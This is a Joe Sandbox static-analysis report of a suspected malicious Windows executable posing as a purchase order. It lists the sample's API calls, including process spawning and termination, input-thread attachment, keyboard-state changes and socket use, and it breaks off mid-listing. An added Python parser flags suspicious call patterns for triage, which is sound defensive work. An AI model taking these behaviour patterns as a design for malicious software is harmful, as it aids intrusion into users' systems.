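The per-function "APIs" listings in this report (the WinINet sequence directly above, the GetForegroundWindow/AttachThreadInput function and the WSOCK32 function among them) follow one line format: a bullet, an optional "Part of subcall function X:" prefix, `Name.MODULE(args), ref: address`, with `?` for arguments the static pass could not resolve. The following is an added example, not part of the Joe Sandbox report or of Joe Sandbox itself: a small parser for that format plus a few triage rules that run over a constructed excerpt transcribed from the listings on this page. The rule set, the wsock32 ordinal table and the option constant are the author's (wininet.h defines INTERNET_OPTION_SECURITY_FLAGS as 31), and the excerpt is constructed.

```python
"""Parse Joe Sandbox per-function "APIs" listings and flag call patterns worth a
second look during triage. Added example, not the report's or Joe Sandbox's code;
the rules and the ordinal table are the author's choices."""
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# One call per bullet; a "Part of subcall function X:" prefix marks a call made by a callee.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>#?\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# wsock32.dll export ordinals; the listing shows "#N" when the import is by ordinal.
WSOCK32_ORDINALS = {16: "recv", 17: "recvfrom", 19: "send", 20: "sendto"}
INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # wininet.h


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[Optional[int], ...]  # int for hex literals, None for "?" (unresolved)
    ref: int                         # call-site address
    subcall: Optional[str]           # callee address when listed as a subcall


def _parse_args(raw: Optional[str]) -> Tuple[Optional[int], ...]:
    if not raw or not raw.strip():
        return ()
    return tuple(None if a.strip() == "?" else int(a, 16) for a in raw.split(","))


def parse_functions(text: str):
    """Split the listing at each "APIs" header and parse the bullet lines after it."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if not m:                      # "Memory Dump Source" etc. ends the call list
            current = None
            continue
        name = m["name"]
        if name.startswith("#") and m["mod"].upper() == "WSOCK32":
            name = WSOCK32_ORDINALS.get(int(name[1:]), name)
        current.append(ApiCall(name, m["mod"], _parse_args(m["args"]), int(m["ref"], 16), m["sub"]))
    return functions


def triage(functions):
    """Return (function index, address of first call, note) for every rule that fires."""
    findings = []
    for i, calls in enumerate(functions):
        if not calls:
            continue
        names = {c.name for c in calls}
        first = calls[0].ref
        for c in calls:
            # The flags travel by pointer (3rd argument), so the listing cannot show which
            # SECURITY_FLAG_IGNORE_* bits are set; they must be read from the dump at c.ref.
            if c.name == "InternetSetOptionW" and len(c.args) > 1 and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS:
                findings.append((i, first, "InternetSetOptionW writes INTERNET_OPTION_SECURITY_FLAGS at "
                                           "%08X; inspect the buffer for SECURITY_FLAG_IGNORE_* bits" % c.ref))
        if {"GetForegroundWindow", "AttachThreadInput"} <= names:
            findings.append((i, first, "attaches to the foreground window's input thread"))
        if "CreateProcessW" in names:
            findings.append((i, first, "spawns a process; recover the command line from the dump"))
        if "recvfrom" in names:
            findings.append((i, first, "socket receive via wsock32 ordinal 17 (recvfrom)"))
    return findings


# Constructed excerpt, transcribed in the report's listing format from three of its functions.
SAMPLE = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AE4C5E
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AE4C8A
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AE4CCC
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AE4CE1
• InternetCloseHandle.WININET(00000000), ref: 00AE4D65
  • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
Memory Dump Source
APIs
• GetCurrentThreadId.KERNEL32 ref: 00AD4A7D
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4A91
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AD3AD7,?,00000001), ref: 00AD4AA7
Memory Dump Source
APIs
• select.WSOCK32 ref: 00AE9B38
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AE9B90
"""

if __name__ == "__main__":
    for index, addr, note in triage(parse_functions(SAMPLE)):
        print("function %d @ %08X: %s" % (index, addr, note))
```

The rules deliberately report where to look rather than what was found: the static listing records argument pushes, so a value such as `00000100` in the InternetSetOptionW line is whatever sat in that stack slot, not necessarily the flags word, and the actual SECURITY_FLAG bits have to be confirmed in the memory dump or under the debugger.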
                      APIs
                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2DBF0), ref: 00AEBBA1
                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2DBF0), ref: 00AEBBD5
                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00AEBD33
                      • SysFreeString.OLEAUT32(?), ref: 00AEBD5D
                      • StringFromGUID2.OLE32(?,?,00000028,?,00B2DBF0), ref: 00AEBEAD
                      • ProgIDFromCLSID.OLE32(?,?,?,00B2DBF0), ref: 00AEBEF7
                      • CoTaskMemFree.OLE32(?,?,?,00B2DBF0), ref: 00AEBF14
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                      • String ID:
                      • API String ID: 793797124-0
                      • Opcode ID: a1a89c0880a6505850e9854b6530d1c3c7723f8eba49234385219eb64007697f
                      • Instruction ID: 72c1552410be91b6bd01b8be8b35e23d1a3f7cb8d99ea3f59e03a2008fb18169
                      • Opcode Fuzzy Hash: a1a89c0880a6505850e9854b6530d1c3c7723f8eba49234385219eb64007697f
                      • Instruction Fuzzy Hash: 96F10A75A10109EFCF04DFA5C988EAEB7B9FF89314F108499F905AB250DB31AE41CB60
                      APIs
                      • _memset.LIBCMT ref: 00AF23E6
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF2579
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AF259D
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25DD
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AF25FF
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF2760
                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00AF2792
                      • CloseHandle.KERNEL32(?), ref: 00AF27C1
                      • CloseHandle.KERNEL32(?), ref: 00AF2838
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                      • String ID:
                      • API String ID: 4090791747-0
                      • Opcode ID: e181d3ce592c2b78cdd1219bb38d217a5c065a9529f56c36ee52509f4cee1b55
                      • Instruction ID: e5efd82413fb31dbaf5ceeea81788936146433d01724bd19df93d6a5114372c9
                      • Opcode Fuzzy Hash: e181d3ce592c2b78cdd1219bb38d217a5c065a9529f56c36ee52509f4cee1b55
                      • Instruction Fuzzy Hash: 89D1BD31604305DFCB14EF64C991B6ABBE5EF85320F14885DF9899B2A2DB30DC41CB52
                      APIs
                      • select.WSOCK32 ref: 00AE9B38
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9B45
                      • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00AE9B6F
                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AE9B90 (import by ordinal; wsock32 ordinal 17 is recvfrom)
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9B9F
                      • htons.WSOCK32(?), ref: 00AE9C51
                      • inet_ntoa.WSOCK32(?), ref: 00AE9C0C
                        • Part of subcall function 00ACE0F5: _strlen.LIBCMT ref: 00ACE0FF
                        • Part of subcall function 00ACE0F5: _memmove.LIBCMT ref: 00ACE121
                      • _strlen.LIBCMT ref: 00AE9CA7
                      • _memmove.LIBCMT ref: 00AE9D10
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                      • String ID:
                      • API String ID: 3637404534-0
                      • Opcode ID: 62fc30a5349f576cc0ab824b2ec18c38bfd16360e292ebb7ef2a6f0440eb1574
                      • Instruction ID: b4fa80dfec5f76868598a65483cac54477ecf3a6275f9f7eb1ab3521c8d6c30a
                      • Opcode Fuzzy Hash: 62fc30a5349f576cc0ab824b2ec18c38bfd16360e292ebb7ef2a6f0440eb1574
                      • Instruction Fuzzy Hash: B4819C71604340AFDB10EF25CD85EABB7E9EB89724F104629F5559B291DB30D904CBA2
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AFB204
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B0E9EA
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B0EA0B
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B0EA20
                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B0EA3D
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B0EA64
                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00AAA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B0EA6F
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B0EA8C
                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00AAA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B0EA97
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                      • String ID:
                      APIs
                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF737
                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF77E
                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EB55
                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EBC1
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      APIs
                        • Part of subcall function 00ACE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACE158
                        • Part of subcall function 00ACE138: GetCurrentThreadId.KERNEL32 ref: 00ACE15F
                        • Part of subcall function 00ACE138: AttachThreadInput.USER32(00000000,?,00ACCDFB,?,00000001), ref: 00ACE166
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE06
                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ACCE23
                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ACCE26
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE2F
                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ACCE4D
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE50
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE59
                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ACCE70
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE73
                      Similarity
                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                      • String ID:
                      Similarity
                      • API ID:
                      • String ID: NULL Pointer assignment$Not an Object type
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AF9926
                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AF993A
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AF9954
                      • _wcscat.LIBCMT ref: 00AF99AF
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AF99C6
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AF99F4
                      Similarity
                      • API ID: MessageSend$Window_wcscat
                      • String ID: SysListView32
                      APIs
                        • Part of subcall function 00AD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                        • Part of subcall function 00AD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                        • Part of subcall function 00AD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF168B
                      • GetLastError.KERNEL32 ref: 00AF169E
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF16CA
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AF1746
                      • GetLastError.KERNEL32(00000000), ref: 00AF1751
                      • CloseHandle.KERNEL32(00000000), ref: 00AF1786
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 00AD62D6
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00AD7595
                      • LoadStringW.USER32(00000000), ref: 00AD759C
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AD75B2
                      • LoadStringW.USER32(00000000), ref: 00AD75B9
                      • _wprintf.LIBCMT ref: 00AD75DF
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD75FD
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 00AD75DA
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2AE7
                      Similarity
                      • API ID: BuffCharConnectRegistryUpper_memmove
                      • String ID:
                      APIs
                      • __mtinitlocknum.LIBCMT ref: 00ABB744
                        • Part of subcall function 00AB8A0C: __FF_MSGBANNER.LIBCMT ref: 00AB8A21
                        • Part of subcall function 00AB8A0C: __NMSG_WRITE.LIBCMT ref: 00AB8A28
                        • Part of subcall function 00AB8A0C: __malloc_crt.LIBCMT ref: 00AB8A48
                      • __lock.LIBCMT ref: 00ABB757
                      • __lock.LIBCMT ref: 00ABB7A3
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00B46948,00000018,00AC6C2B,?,00000000,00000109), ref: 00ABB7BF
                      • EnterCriticalSection.KERNEL32(8000000C,00B46948,00000018,00AC6C2B,?,00000000,00000109), ref: 00ABB7DC
                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 00ABB7EC
                      Similarity
                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                      • String ID:
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ADA1CE
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ADA205
                      • EnterCriticalSection.KERNEL32(?), ref: 00ADA221
                      • _memmove.LIBCMT ref: 00ADA26F
                      • _memmove.LIBCMT ref: 00ADA28C
                      • LeaveCriticalSection.KERNEL32(?), ref: 00ADA29B
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ADA2B0
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA2CF
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                      • String ID:
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00AF8CF3
                      • GetDC.USER32(00000000), ref: 00AF8CFB
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF8D06
                      • ReleaseDC.USER32(00000000,00000000), ref: 00AF8D12
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00AF8D4E
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF8D5F
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AFBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00AF8D99
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AF8DB9
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                      • _wcstok.LIBCMT ref: 00AE1D6E
                      • _wcscpy.LIBCMT ref: 00AE1DFD
                      • _memset.LIBCMT ref: 00AE1E30
                      Similarity
                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                      • String ID: X
                      APIs
                      • _memset.LIBCMT ref: 00AF214B
                      • _memset.LIBCMT ref: 00AF2214
                      • ShellExecuteExW.SHELL32(?), ref: 00AF2259
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                      • CloseHandle.KERNEL32(00000000), ref: 00AF2320
                      • FreeLibrary.KERNEL32(00000000), ref: 00AF232F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                      • String ID: @
                      • API String ID: 4082843840-2766056989
                      • Opcode ID: a144da1914adc740bbc5e78aee7801767c62392e1b752283c55b334e2a2da9c0
                      • Instruction ID: 13ed0317898eb1f75f63d3160c3c2c0e534ab034551ac66749378a4c5baf9299
                      • Opcode Fuzzy Hash: a144da1914adc740bbc5e78aee7801767c62392e1b752283c55b334e2a2da9c0
                      • Instruction Fuzzy Hash: 94718C71A00619DFCF14EFA8CA81AAEBBF5FF49310F108559E956AB351DB34AD40CB90
                      APIs
                      • GetParent.USER32(?), ref: 00AD481D
                      • GetKeyboardState.USER32(?), ref: 00AD4832
                      • SetKeyboardState.USER32(?), ref: 00AD4893
                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00AD48C1
                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00AD48E0
                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00AD4926
                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00AD4949
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 1f1db06a1ccbc2c22d4482b1dcb13582023cca30e80b61b7039ad3203f377cc1
                      • Instruction ID: b630f6ee18f342c77eccca71acfecfefb80dc19767a3741c6791c5427aeff23e
                      • Opcode Fuzzy Hash: 1f1db06a1ccbc2c22d4482b1dcb13582023cca30e80b61b7039ad3203f377cc1
                      • Instruction Fuzzy Hash: A751D4A05087D13EFB364724CC55BBBBFA95B0A304F08858AE1D656AC2C6E4EC84E750
                      APIs
                      • GetParent.USER32(00000000), ref: 00AD4638
                      • GetKeyboardState.USER32(?), ref: 00AD464D
                      • SetKeyboardState.USER32(?), ref: 00AD46AE
                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00AD46DA
                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00AD46F7
                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00AD473B
                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00AD475C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessagePost$KeyboardState$Parent
                      • String ID:
                      • API String ID: 87235514-0
                      • Opcode ID: 06bcccb1f0752f12cefb3930d0eec68951a6c56138384352269274213a1cffe8
                      • Instruction ID: 5e78d263225439fdfb6f4a552dea2af533bfdf8dafa6906fabbdd77a0537445d
                      • Opcode Fuzzy Hash: 06bcccb1f0752f12cefb3930d0eec68951a6c56138384352269274213a1cffe8
                      • Instruction Fuzzy Hash: 9751E8A05047D53FFB3687248C45BBABFA96B0B304F08848AE1E756AC2D7B4EC94D750
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcsncpy$LocalTime
                      • String ID:
                      • API String ID: 2945705084-0
                      • Opcode ID: 0b7d720109e4f3056aa99a49f5f2861a3fa83c9b9f6c5d0e42fe3b2dbd045e28
                      • Instruction ID: a538a293f400c2a4ee25122dcbbf366efcb75691f00576c6928077c57ca16e13
                      • Opcode Fuzzy Hash: 0b7d720109e4f3056aa99a49f5f2861a3fa83c9b9f6c5d0e42fe3b2dbd045e28
                      • Instruction Fuzzy Hash: 63413C65C1021476CB10EBF5C887ACFB7BCAF15350F908867E929F3222EA34E65587E5
                      APIs
                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00AE9409
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9416
                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00AE943A
                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00AE9452
                      • _strlen.LIBCMT ref: 00AE9484
                      • _memmove.LIBCMT ref: 00AE94CA
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE94F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLast$_memmove_strlenselect
                      • String ID:
                      • API String ID: 2795762555-0
                      • Opcode ID: 6b04874a23b7c82cc62fbae5638af01b1e8f239d7e2d5c54aa2533251b269d12
                      • Instruction ID: f3a19b10384a9190851a70a9e998c8de750c5c9cfa71ff8caf14f313fc7b3479
                      • Opcode Fuzzy Hash: 6b04874a23b7c82cc62fbae5638af01b1e8f239d7e2d5c54aa2533251b269d12
                      • Instruction Fuzzy Hash: D9417275600248AFDB14EBA5CD95EEEB7BDEF48310F108169F516972D2DB30AE41CB60
                      APIs
                      • _memset.LIBCMT ref: 00AF9DB0
                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9E57
                      • IsMenu.USER32(?), ref: 00AF9E6F
                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9EB7
                      • DrawMenuBar.USER32 ref: 00AF9ED0
                      Strings
                      Memory Dump Source
